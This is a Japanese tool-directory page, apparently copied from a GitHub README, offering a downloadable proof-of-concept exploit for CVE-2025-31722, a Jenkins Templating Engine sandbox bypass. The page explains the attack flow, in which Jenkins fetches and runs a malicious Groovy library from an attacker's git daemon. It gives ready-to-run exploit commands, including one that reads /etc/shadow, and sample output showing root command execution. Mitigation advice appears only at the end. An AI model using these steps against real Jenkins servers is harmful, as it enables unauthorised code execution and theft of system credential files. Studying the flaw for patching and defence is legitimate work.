Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-31722 — Jenkins Templating Engineプラグインのサンドボックスバイパス(CVE-2025-31722)の概念実証エクスプロイト。悪意のあるGroovyライブラリインジェクションを介したリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/h3raklez/cve-2025-31722
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

Jenkins Templating Engineプラグインのサンドボックスバイパス(CVE-2025-31722)の概念実証エクスプロイト。悪意のあるGroovyライブラリインジェクションを介したリモートコード実行を可能にします。

リポジトリを見る
345ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-31722 — Jenkins Templating Engine RCE

教育および許可されたセキュリティ研究目的に限ります。

説明

Jenkins Templating Engine (JTE) プラグイン <= 2.5.3 におけるサンドボックスバイパス脆弱性であり、低権限ユーザーが Jenkins サーバー上で任意のコードを実行できるものです。

この欠陥は、JTE がフォルダーレベルの GovernanceTier 設定で定義された外部 Git リポジトリからライブラリを読み込み、ジョブを作成したユーザーの権限レベルに関係なく、それらのライブラリのステップを Groovy サンドボックス外 で実行するために発生します。

CVSS: 8.8 (高)
タイプ: サンドボックスバイパス → RCE
影響を受けるコンポーネント: pipeline-templating-engine プラグイン ≤ 2.5.3
修正バージョン: 2.5.4+


攻撃フロー

root@kitploit:~
Attacker (Kali)                          Jenkins Server
───────────────                          ──────────────
1. Creates git repo with evil.groovy
2. Starts git daemon on :9418
3. Creates folder in Jenkins        →    Folder with GovernanceTier
   pointing to git://KALI:9418/…         pointing to attacker's repo
4. Creates job with AdHoc template  →    Job calls evil()
5. Triggers build                   →    JTE clones repo from Kali
                                         Executes evil() outside sandbox
                                    ←    RCE as Jenkins user

必要条件

Jenkins サーバー(ターゲット)

  • Templating Engine 2.5.3 プラグインがインストールされた Jenkins
  • プラグイン: cloudbees-folder, git, workflow-aggregator
  • CSRF 無効
  • ユーザー attacker が以下の権限を持つ: Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • 組み込みノードがオンラインで、少なくとも 1 つのエグゼキュータがあること
  • サーバーから攻撃者の IP へのポート 9418 でのアウトバウンドネットワーク接続

攻撃者マシン (Kali)

  • Python 3.8+
  • git がインストールされていること
  • ポート 9418 が Jenkins サーバーから到達可能であること
  • Python ライブラリ: requests
root@kitploit:~
pip install requests

ラボのセットアップ

Debian/Ubuntu サーバーにインストールされたセットアップは、Jenkins をインストールし、ユーザー、権限、必要なプラグインを構成しました。悪意のあるコンテンツは作成しません — それは PoC によってのみ処理されます。


使用方法

基本エクスプロイト

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

カスタムコマンド

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

クリーンアップ

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

パラメータ

パラメータ説明必須
--urlJenkins のベース URLはい
--userItem/CREATE+CONFIGURE+BUILD 権限を持つユーザーはい
--passユーザーパスワードはい
--git-hostJenkins から到達可能な Kali の IPはい
--cmdサーバー上で実行するコマンド(デフォルト: id && hostname && cat /etc/passwd)いいえ
--cleanupエクスプロイトによって作成されたフォルダー、ジョブ、リポジトリを削除しますいいえ

PoC の動作仕組み

  1. setup_repo() — Kali 上にコマンドを実行するための ~/jte-exploit/evil-lib/steps/evil.groovy を作成
  2. start_git_daemon() — Kali 上でポート 9418 で git daemon を起動
  3. create_folder() — git://KALI:9418/jte-exploit を指す GovernanceTier を持つフォルダーを Jenkins に作成
  4. create_job() — evil-lib を宣言し evil() を呼び出す AdHocTemplateFlowDefinition を持つジョブを作成
  5. trigger_and_wait() — ビルドをトリガーし、結果を待機
  6. print_output() — RCE 結果を含むコンソール出力を表示

Git デーモンはビルドサイクル全体を通じて稼働し続け、ビルドが完了すると自動的に終了します。


期待される出力

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Target  : http://10.211.55.10:8080
  Git host: 10.211.55.7
  Command : id && hostname && cat /etc/passwd
=================================================================

[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued

=================================================================
  CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

緩和策

  • Templating Engine プラグインをバージョン 2.5.4 以降 に更新
  • Item/CREATE および Item/CONFIGURE 権限を信頼できるユーザーのみに制限
  • Jenkins で CSRF 保護を有効化
  • 外部リポジトリを指す GovernanceTier 設定を持つフォルダーを監査

参考文献

  • Jenkins Security Advisory
  • JTE Plugin GitHub

法的免責事項: この PoC は教育目的および管理された環境でのテストのみを目的としています。明示的な許可なくシステムに対して使用することは違法です。

ツールをダウンロード